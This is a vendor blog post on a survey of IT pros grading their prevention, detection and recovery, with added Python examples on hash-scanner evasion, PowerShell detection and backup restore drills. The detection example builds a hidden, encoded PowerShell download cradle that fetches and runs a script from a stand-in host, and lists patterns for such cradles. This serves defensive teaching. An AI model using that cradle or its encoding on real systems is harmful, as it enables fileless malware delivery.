We asked IT pros to grade their organizations on the three core aspects of security: prevention, detection, and recovery. See how you stack up.
Managing security in today's rapidly evolving threat environment is a complex task. Not only do organizations need to prevent an increasingly varied set of attacks, they also need the tools and processes in place to detect incidents quickly and recover from them when they do occur.
Finding the right balance between these three areas of focus can be difficult, especially when your time and budget are limited.
We recently surveyed IT managers and system admins at small and medium-sized businesses to find out which types of security efforts they're prioritizing most often, and how they'd grade their organizations' current capabilities. While responses varied, the majority reflected a need for improvement across the board.
Prevention
Goal: Keep malicious software off your systems and avoid unauthorized access
Example solutions: Antivirus, firewalls, email filtering, whitelisting, patch management, security awareness training, etc.
Priority rank: #1
Out of the three major areas of focus (prevention, detection, and recovery), the majority of respondents placed the highest priority on prevention. If given additional budget, 51% said they would invest in prevention first.
One third of IT pros give their organization an 'F' in prevention.
One big contributing factor for that dour outlook might be an over-reliance on outdated technology. The most common prevention solutions — antivirus, firewalls, etc. — attempt to identify and block malware by scanning static files for known signatures or hashes. That is a technique many modern attacks actively bypass, either by altering the malware just enough that its signature or hash no longer matches, or by abusing legitimate, already-installed tools (for example, Microsoft PowerShell) to run malicious code in memory without ever writing a malicious file to disk.
As a result, organizations are getting infected even if they have traditional prevention software in place. According to a separate survey we conducted late last year, over half the organizations targeted by cyber attacks in 2016 fell victim to one or more of them.
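To make the two evasion techniques above concrete, here is an added example written for this edit (it is not Barkly's code and not any product's detection logic). A toy hash blocklist stands in for a static file scanner: one appended byte defeats it. Beside that, a small behavioural check inspects PowerShell command lines, including the payload hidden in a -EncodedCommand argument, which is genuinely how PowerShell encodes it (base64 of UTF-16LE text). The sample bytes, the command lines and the indicator patterns are constructed assumptions for illustration only.

```python
from __future__ import annotations

import base64
import hashlib
import re

# Constructed stand-in for a known-bad file (not real malware): a fake MZ header plus filler.
KNOWN_BAD = b"MZ\x90\x00" + b"CONSTRUCTED_SAMPLE_BODY" * 4

# What a hash-based static scanner effectively holds: exact SHA-256 values of known-bad files.
BLOCKLIST = {hashlib.sha256(KNOWN_BAD).hexdigest()}


def static_scanner_blocks(file_bytes: bytes) -> bool:
    """Static, file-based check: blocks only byte-for-byte known files."""
    return hashlib.sha256(file_bytes).hexdigest() in BLOCKLIST


def repack(file_bytes: bytes) -> bytes:
    """Simulates the 'slight alteration' evasion: one appended padding byte leaves
    the program's behaviour intact but changes its hash entirely."""
    return file_bytes + b"\x00"


# Assumed behavioural indicators for PowerShell used as a fileless loader.
# These are illustrative heuristics for this example, not a vendor's signature set.
INDICATORS = [
    ("encoded command", re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{8,}", re.I)),
    ("hidden window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("no profile", re.compile(r"-no(?:p|profile)\b", re.I)),
    ("invoke-expression", re.compile(r"\biex\b|invoke-expression", re.I)),
    ("download cradle", re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I)),
]


def decode_encoded_command(cmdline: str) -> str | None:
    """PowerShell's -EncodedCommand takes base64 of the script as UTF-16LE text;
    decode it so indicators hidden inside the blob can be inspected."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def powershell_indicators(cmdline: str) -> list[str]:
    """Returns the names of indicators found in the raw command line or in its
    decoded -EncodedCommand payload. An empty list means nothing suspicious."""
    texts = [cmdline]
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        texts.append(decoded)
    return [name for name, pattern in INDICATORS if any(pattern.search(t) for t in texts)]


# Constructed process-creation command lines (not captured from a real system).
SAMPLE_BENIGN = r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -File C:\Scripts\nightly-report.ps1'
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
SAMPLE_FILELESS = "powershell.exe -nop -w hidden -enc " + base64.b64encode(_CRADLE.encode("utf-16-le")).decode("ascii")

if __name__ == "__main__":
    print("blocklist stops original:", static_scanner_blocks(KNOWN_BAD))         # True
    print("blocklist stops repacked:", static_scanner_blocks(repack(KNOWN_BAD)))  # False
    print("benign:", powershell_indicators(SAMPLE_BENIGN))
    print("fileless:", powershell_indicators(SAMPLE_FILELESS))
```

The fileless sample never produces a file for the static scanner to hash; everything it needs is in the command line, so the only place to catch it is in process-creation telemetry, and only if you decode the blob rather than matching on the raw string.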
Detection
Goal: Become aware of security incidents and suspicious activity as quickly as possible
Example solutions: Intrusion detection system (IDS), network monitoring tools, etc.
Priority rank: #2
Slightly more than a quarter of respondents said they would prioritize additional detection tools and resources over additional prevention solutions.
43% of IT pros gave their organizations failing grades for detection, but still see it as a lower priority than prevention.
Many of the IT pros that gave their organizations high marks for prevention also gave comparably high scores for detection, though slightly more did indicate there was major need for improvement.
Despite the need for more help in this area, respondents still listed prevention as a higher priority for future budget allocation. That may be partly attributable to the high barrier to entry for most detection and response solutions, which are typically more complex and often require a prohibitive investment of time, money, staff, and resources to manage.
IT pros also point to the record rise in ransomware as a reason for shifting their focus to prevention from detection. Since ransomware attacks can encrypt files in a matter of minutes or even seconds, detecting and responding to the attack after the fact means it's too late. The damage is already done.
Recovery
Goal: Make cleaning up and getting back to normal after an attack as quick and painless as possible
Example solutions: Backup, forensics, etc.
Priority rank: #3
Nearly half the respondents stated they would make recovery their third priority behind both prevention and detection. Why? Because the majority feel like they've got this bucket covered.
4 out of 5 IT pros gave their organizations passing grades for recovery.
While the grades for prevention and detection were mixed, it's clear that most IT pros feel they've got recovery nailed. Not only did 83 percent give their organizations passing grades, nearly 50 percent gave themselves an 'A' — twice the number of 'A's handed out for prevention and detection.
Why such a big difference? The answer may lie in confidence in backup solutions. According to a separate survey Barkly conducted, 81 percent of IT pros were confident restoring from backup would provide complete recovery from a ransomware attack. Unfortunately, when we followed up with respondents who had actually suffered ransomware attacks, less than half reported they were able to recover all their data successfully.
No backup is fail-proof. It's easy to assume you'll be covered when you need it most, but unless you are actively testing restores, that's just wishful thinking. Learn how to establish a reliable backup strategy here.
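A backup you have never restored is an assumption, not a control. The following added example (written for this edit, not Barkly's code and not a description of any particular backup product) records a SHA-256 manifest of the source at backup time, then runs a restore drill into an empty directory and compares every restored file against that manifest. The sample files, the tar.gz layout and the exclude parameter used to simulate a misconfigured backup job are all constructed for illustration.

```python
from __future__ import annotations

import hashlib
import json
import tarfile
import tempfile
from pathlib import Path


def sha256_file(path: Path) -> str:
    """Streamed SHA-256 so large files do not have to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def manifest_path(archive: Path) -> Path:
    return archive.parent / (archive.name + ".manifest.json")


def make_backup(source: Path, archive: Path, exclude: frozenset[str] = frozenset()) -> dict[str, str]:
    """Archive `source` into a tar.gz and write a manifest {relative path: sha256}
    of everything that SHOULD be protected. `exclude` simulates a backup job whose
    include rules silently skip some files (assumed failure mode for the drill)."""
    manifest: dict[str, str] = {}
    with tarfile.open(archive, "w:gz") as tar:
        for p in sorted(source.rglob("*")):
            if not p.is_file():
                continue
            rel = p.relative_to(source).as_posix()
            manifest[rel] = sha256_file(p)  # intent: this file is covered
            if rel not in exclude:
                tar.add(str(p), arcname=rel)
    manifest_path(archive).write_text(json.dumps(manifest, indent=2))
    return manifest


def verify_restore(archive: Path, restore_dir: Path) -> list[str]:
    """Restore the archive into `restore_dir` and check every manifest entry.
    Returns a list of problems; an empty list means the restore drill passed."""
    manifest = json.loads(manifest_path(archive).read_text())
    restore_dir.mkdir(parents=True, exist_ok=True)
    with tarfile.open(archive, "r:gz") as tar:
        try:
            tar.extractall(str(restore_dir), filter="data")  # Python 3.12+ (and backports)
        except TypeError:
            tar.extractall(str(restore_dir))                 # older interpreters
    problems = []
    for rel, expected in manifest.items():
        restored = restore_dir / rel
        if not restored.is_file():
            problems.append(f"missing: {rel}")
        elif sha256_file(restored) != expected:
            problems.append(f"corrupt: {rel}")
    return problems


def run_restore_drill() -> tuple[list[str], list[str]]:
    """Self-contained drill on constructed sample data: one good backup and one
    whose job excludes a file. Returns both verification results."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        source = root / "source"
        (source / "db").mkdir(parents=True)
        (source / "docs").mkdir()
        # Constructed sample files standing in for real data.
        (source / "db" / "customers.sqlite").write_bytes(b"SQLite format 3\x00" + b"x" * 1024)
        (source / "docs" / "policy.txt").write_text("constructed sample document\n")

        good = root / "good.tar.gz"
        make_backup(source, good)
        good_result = verify_restore(good, root / "restore_good")

        bad = root / "bad.tar.gz"
        make_backup(source, bad, exclude=frozenset({"db/customers.sqlite"}))
        bad_result = verify_restore(bad, root / "restore_bad")
    return good_result, bad_result


if __name__ == "__main__":
    good_result, bad_result = run_restore_drill()
    print("good backup:", good_result or "restore drill passed")
    print("misconfigured backup:", bad_result)
```

The manifest is written from the source, not from the archive, so the drill catches files the backup job never captured as well as files that came back corrupted. Run it on a schedule against a restore target that is not your production system, and treat any non-empty result as an incident rather than a warning.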
Mixing It All Together for Balanced Security
Prevention, detection, and recovery are all important bases to cover. How did the respondents grade their organizations in terms of finding the right balance between all three?
40% of IT pros give their organization a failing grade for having a balanced security stack.
They may feel like they're covered in terms of incident recovery, but until they improve on the prevention and detection fronts, many IT pros believe their security stacks still need work.
The key to doing that effectively is something Barkly co-founder and CTO Jack Danahy has written about extensively.
His #1 rule: Don't further exacerbate the problem by adding shelfware.
"Security products are the treadmills of IT. Before you rush into buying another one, ask yourself, how can I revisit our existing tools, identify where our gaps are, and determine how to mitigate the most serious threats to our most vulnerable and valuable resources?"
Finding the right balance takes work up front, but taking the time to grade yourself, as these IT pros did, can help you identify which areas you most need to prioritize and improve.
Quick wins for improving your security in 2017 — no new budget required
Whether you already have changes planned for your security stack or not, there are plenty of things you can be doing to better secure your organization. Make sure you have your bases covered with a free copy of our Open Source Cybersecurity Playbook and 2017 Cybersecurity Checklist.
Feature photo by Nicolas Raymond